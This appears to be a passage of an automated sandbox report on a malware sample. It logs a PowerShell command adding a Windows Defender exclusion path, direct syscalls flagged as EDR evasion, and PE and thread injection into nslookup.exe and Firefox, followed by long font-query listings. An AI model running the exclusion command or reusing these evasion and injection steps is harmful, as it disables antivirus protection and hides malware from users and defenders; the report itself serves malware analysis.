Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84A80 mov eax, dword ptr fs:[00000030h]	5_2_01C84A80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEAAEE mov eax, dword ptr fs:[00000030h]	5_2_01BEAAEE
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEAAEE mov eax, dword ptr fs:[00000030h]	5_2_01BEAAEE
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C06AA4 mov eax, dword ptr fs:[00000030h]	5_2_01C06AA4
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0AD0 mov eax, dword ptr fs:[00000030h]	5_2_01BB0AD0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE4AD0 mov eax, dword ptr fs:[00000030h]	5_2_01BE4AD0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE4AD0 mov eax, dword ptr fs:[00000030h]	5_2_01BE4AD0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD4A35 mov eax, dword ptr fs:[00000030h]	5_2_01BD4A35
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD4A35 mov eax, dword ptr fs:[00000030h]	5_2_01BD4A35
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDEA2E mov eax, dword ptr fs:[00000030h]	5_2_01BDEA2E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BECA24 mov eax, dword ptr fs:[00000030h]	5_2_01BECA24
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5EA60 mov eax, dword ptr fs:[00000030h]	5_2_01C5EA60
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2CA72 mov eax, dword ptr fs:[00000030h]	5_2_01C2CA72
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2CA72 mov eax, dword ptr fs:[00000030h]	5_2_01C2CA72
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BECA6F mov eax, dword ptr fs:[00000030h]	5_2_01BECA6F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BECA6F mov eax, dword ptr fs:[00000030h]	5_2_01BECA6F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BECA6F mov eax, dword ptr fs:[00000030h]	5_2_01BECA6F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3CA11 mov eax, dword ptr fs:[00000030h]	5_2_01C3CA11

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe"
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Memory written: C:\Users\user\Desktop\A4mmSHCUi2.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: NULL target: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: NULL target: C:\Windows\SysWOW64\nslookup.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: NULL target: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: NULL target: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\nslookup.exe

Thread register set: target process: 8152

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\nslookup.exe

Thread APC queued: target process: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: wioTZtEQwu.exe, 0000000A.00000000.1906345808.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107898767.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4107963181.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: wioTZtEQwu.exe, 0000000A.00000000.1906345808.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107898767.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4107963181.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: wioTZtEQwu.exe, 0000000A.00000000.1906345808.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107898767.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4107963181.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: wioTZtEQwu.exe, 0000000A.00000000.1906345808.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107898767.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4107963181.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Users\user\Desktop\A4mmSHCUi2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
